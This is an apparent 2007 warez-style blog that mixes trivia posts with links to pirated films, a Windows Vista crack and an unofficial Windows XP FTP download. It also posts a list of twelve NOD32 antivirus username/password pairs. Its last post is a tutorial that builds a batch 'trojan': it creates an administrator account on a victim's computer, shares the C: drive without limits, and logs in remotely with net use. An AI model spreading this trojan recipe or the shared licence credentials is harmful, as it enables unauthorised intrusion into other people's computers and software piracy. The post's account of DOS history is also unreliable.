Sixe-
http://d01.megashares.com/?d01=16b42c5
or
http://www.file27.com/id9329/%5BColecionador-thegenius.us%5DI.am.legend.DVDscr.rmvb-MODiFY.rmvb
Tuesday, December 25, 2007
I am legend
Saturday, December 22, 2007
Most Expensive Home 2007
Updown Court Windlesham, Surrey
Cost: $138 million
Larger than either Buckingham or Hampton Court palace, this 103-room home has 58 acres of gardens and woodlands, making it the idyllic English country home for those flush with cash.
Several ballrooms and grand entrance ways punctuate this house, which has a panic room, an indoor squash court, bowling alley, 50-seat cinema, helipads, space for eight limousines and a heated marble driveway.
World’s Most Expensive Phone Number
World’s Most Expensive Phone Number
The number, 666 6666 is the world’s most expensive phone number was sold for 10 millions Qatari riyals or £1.5 millions at a charity auction in Qatar recently.
The previous record holder was Chinese number 8888 8888, which sold for £270,000. The Cantonese word for eight sounds very similar to the word for rich. It was bought by Sichuan Airlines.
Friday, December 14, 2007
Create your @windowslive.com email adress now
FINLAND
WINDOWSLIVE.COM
use this website
http://get.live.com/fi-FI/mail/overview
Hitman The movie (Divx)
Tuesday, December 11, 2007
NOD32 latest serials
Username:EAV-00318694
Password:j6wtpeb7jd
Username:EAV-00451189
Password:p4dv8rv78m
Username:EAV-00315178
Password:64468mwn5b
Username:EAV-00452737
Password:ur5ec8kpnh
Username:EAV-00318928
Password:jhb33f3kh3
Username: EAV-00453479
Password: 86n2dkhkc3
Username:EAV-00760315
Password:nvvxcpvvcw
Username:EAV-00315173
Password:eju7k6b3b7
Username:EAV-00315164
Password:apnfa233fe
Username:EAV-00315169
Password:38uewfnnaj
Username:EAV-00315172
Password:k44fr52j3t
Username:EAV-00319238
Password:kf7jehkjs4
Monday, December 10, 2007
Chalk Art Optical Illusion
Friday, December 7, 2007
Windows XP Service Pack 3 RC1 Download
The Release Candidate 1 of Windows XP latest service pack, Windows XP Service Pack 3 is now available for download for MSDN members. (Check download link below).
SP3 includes a ton of security updates, some Vista code, and a couple of brand spanking new features for Windows XP:
- There’s a new Windows Product Activation model that does not require you to enter a product key during setup.
- Network Access Protection modules and policies have been brought over from Windows Vista.
- There’s a new module in the kernel that provides access to cryptographic algorithms.
- Windows XP can now detect routers that are discarding data.
Overall the update includes over a thousand patches to improve security, performance, and reliability.
Download: http://www.download.windowsupdate.com/msdownload/update/v3-19990518/cabpool/windowsxp-kb936929-sp3-x86-enu_a2ca583dedcd86837796111a632efa29a23f4cc0.exe
Direct links to download windows XP
Here is a direct ftp link to download windows XP
ftp://82.199.102.119/Pub/Windows/MS-Windows/
Windows Vista original working crack
Windows Vista paradox crack....I tested it and its working 100%
Download it here :D
http://www.MegaShare.com/321203
How to Hard reset iPod
iPod hard reset
If your iPod won't mount on your computer's desktop and can't be soft restored, you need to hard reset. Follow these steps to mount the iPod:
Connect the iPod to a built-in FireWire port on your computer (it won't work with an unpowered FireWire port on a PC Card, for example).
Reset the iPod by pressing the Play and Menu buttons for 10 seconds.
When you see the Apple logo, press and hold the Previous and Next buttons for 10 seconds.
The FireWire icon should appear in your iPod's display.
How to hack in to others computers
since I pretty much enjoy the old ways of hacking: DOS, I thought I would share some of my knowledge to you about DOS hacking. Although, this technique is pretty much out-dated, it may still work on some computers and is worth the read. smile.gif
Okay, before we started, let me explain to you what DOS is and what it can do.
[HIDE-REPLY]What is DOS and what can it do?
Disk Operating System AKA DOS is a command line operating system that Windows runs on top of. It was first created and compiled by Bill Gates while working for IBM. DOS can run various types of command that communicates with your PC and Internet such as CD, Dir, Ren, Copy, Ping, Netsend, Netstat, and so forth.
Getting Started
1. Openining DOS Prompt: Go to start; Click on Run; Type in cmd; Press Ok
2. Opening Notepad: Go to start; Click on Program File; Click on Accessories; Click on Notepad.
Writing The Trojan
First, we are going to create an Admin account on victim's computer, so that we can access to all files. By doing so, we add "net user name /add" into the Notepad. The user account has been created, but we need to it an admin account. By doing so, we add "net localgroup "Administrators" /add name" into the Notepad under the 1st line of command. So far, we have managed to create an admin account on victim's account! But we are not there yet. We need to set a command so that we gain access to the files as well. By doing so, we add "net share system=C: /unlimited" into the Notepad under the 2nd line of command. Now, we need to save the code as a .bat file. Bingo! You just made your first trojan in batch! Pretty easy, huh?
Getting Inside
Now the real fun begins. smile.gif Go to DOS Prompt, and type in "net use victimip name." This command logs you in as an admin on the victim's computer. After being logged in, you pretty much can do what you want. smile.gif For starters, you could browse his harddrive by typing "explorer victimipsystem," and after doing so, it will open a windows explorer starting on his C: Drive.